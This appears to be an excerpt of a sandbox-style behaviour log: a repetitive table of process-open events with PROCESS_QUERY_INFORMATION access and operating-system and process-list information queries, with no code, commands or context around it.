| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| System | Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
